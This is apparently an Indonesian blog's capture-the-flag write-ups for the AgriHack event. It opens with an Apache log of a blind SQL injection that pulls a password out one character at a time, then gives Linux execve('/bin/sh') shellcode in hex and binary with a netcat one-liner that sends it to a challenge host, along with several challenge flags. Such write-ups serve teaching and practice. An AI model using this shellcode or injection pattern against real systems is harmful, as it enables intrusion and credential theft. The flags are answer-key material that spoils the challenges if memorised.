127.0.0.1 - - [10/Aug/2016:16:41:02 -0400] "GET /?id=7%20and%20ord(substr(password,13,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:03 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E109 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:04 -0400] "GET /?id=7%20and%20ord(substr(password,14,1))%3E110 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:05 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E111 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E103 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E107 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E109 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:06 -0400] "GET /?id=7%20and%20ord(substr(password,15,1))%3E108 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E127 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E63 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:07 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E95 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E111 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E119 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E123 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E125 HTTP/1.1" 302 734 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /hacker.php HTTP/1.1" 200 1011 "-" "Python-urllib/1.15"
127.0.0.1 - - [10/Aug/2016:16:41:08 -0400] "GET /?id=7%20and%20ord(substr(password,16,1))%3E124 HTTP/1.1" 200 925 "-" "Python-urllib/1.15"
view raw Apache Log.txt hosted with ❤ by GitHub
Script Convert from base10 to char :
?? => analysis by yourself :D
#! /usr/bin/env python
# Johan Wayudi
a = [70,76,65,71,123,??,111,??,108,73,115,??,111,111,??,125]
data = ""
for i in range(len(a)):
data += chr(a[i])
print data
view raw base10toChar.py hosted with ❤ by GitHub

Thursday, February 16, 2017

AgriHack : Shellcode (Pwning)

nc ke kebon.agrihack.party 30003 disini kita di suruh memasukkan shellcode dalam bentuk biner, ok kita coba, disini saya... thumbnail 1 summary



nc ke kebon.agrihack.party 30003


disini kita di suruh memasukkan shellcode dalam bentuk biner, ok kita coba, disini saya menggunakan shell code dari shell-strom.org , petunjuk di soal data yang di kirim harus dalam bentuk biner, yaudah payload dari shellcode di atas kita ubah dulu dari hexa base16 ke biner,

payload = \x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80

biner= 001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000
hasil disasmble payload menggunakan library dari pwntools :








kita coba aja dulu kirim payload ke program yang jalan,..







$ (python -c "print '001100011100100111110111111000010101000101101000001011110010111101110011011010000110100000101111011000100110100101101110100010011110001110110000000010111100110110000000'";cat -) | nc kebon.agrihack.party 30002











\\m// yeay..



flag : AGRI{shellcode_itu_keren_tapi_gw_gak_ngerti}




























AgriHack : Header (Basic)

















            gunakan curl dengan perintah -I ( i besar)         Flag : AGRI{flag_ada_di_header}   
thumbnail 1 summary





























gunakan curl dengan perintah -I ( i besar)















Flag : AGRI{flag_ada_di_header}




























AgriHack : So Easy (Basic)

















                Flag : AGRI{d3lic1ou5_0m}     
thumbnail 1 summary





































Flag : AGRI{d3lic1ou5_0m}
































AgriHack : Robots (Basic)

















      diberikan sebuah link kesebuah website (challs.agrihack.party) dengan clue " cari Robot yang ada di sini", penjelasan apa fu...
thumbnail 1 summary

















diberikan sebuah link kesebuah website (challs.agrihack.party) dengan clue " cari Robot yang ada di sini", penjelasan apa fungsi dari file robots.txt ini silahkan baca di sini ,



























flag : AGRI{RoBots_TXT_Is_not_seCurE}



















      

    










Subscribe to:
Posts (Atom)